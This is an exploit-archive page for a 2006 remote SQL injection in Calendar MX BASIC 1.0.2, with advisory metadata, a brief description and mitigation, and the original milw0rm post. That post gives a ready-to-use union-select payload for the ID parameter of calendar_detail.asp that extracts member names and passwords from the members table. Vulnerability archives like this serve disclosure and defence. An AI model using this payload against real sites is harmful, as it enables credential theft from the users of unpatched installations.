header-logo
Suggest Exploit
vendor:
Calendar MX BASIC
by:
ajann
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Calendar MX BASIC
Affected Version From: 1.0.2
Affected Version To: 1.0.2
Patch Exists: NO
Related CWE: N/A
CPE: a:calendarmx:calendar_mx_basic
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Calendar MX BASIC <= 1.0.2 (ID) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in Calendar MX BASIC version 1.0.2. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the back-end database.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  Calendar MX BASIC <= 1.0.2 (ID) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# $$      :  Free

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//calendar_detail.asp?ID=[SQL]

Example:

//calendar_detail.asp?ID=-1%20union%20select%200,M_FIRST,M_PASSWORD,0,0,0,0,0,0,0,0,0,0,0,0%20from%20members%20where%20id%20like%201

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-23]